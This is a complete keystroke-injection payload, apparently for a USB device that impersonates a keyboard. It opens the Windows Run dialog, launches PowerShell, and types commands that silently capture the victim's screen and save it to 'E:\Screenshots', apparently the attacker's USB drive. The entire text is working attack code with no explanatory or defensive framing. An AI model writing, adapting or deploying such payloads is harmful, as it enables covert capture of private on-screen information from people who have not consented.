layout('us')
press("GUI r")
delay(500)
type("powershell\n")
delay(1000)
type("Add-Type -AssemblyName System.Windows.Forms\n")
type("Add-Type -AssemblyName System.Drawing\n")
type("$bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds\n")
type("$bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height\n")
type("$graphics = [System.Drawing.Graphics]::FromImage($bitmap)\n")
type("$graphics.CopyFromScreen($bounds.Location, [System.Drawing.Point]::Empty, $bounds.Size)\n")
type("$bitmap.Save('E:\\Screenshots\\screenshot.png')\n")
type("exit\n")
